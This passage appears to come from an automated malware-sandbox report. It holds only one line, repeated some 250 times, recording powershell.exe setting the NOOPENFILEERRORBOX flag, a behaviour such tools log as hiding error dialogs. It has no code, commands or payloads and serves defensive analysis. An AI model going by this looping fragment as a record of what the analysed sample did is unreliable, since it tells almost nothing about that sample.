Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
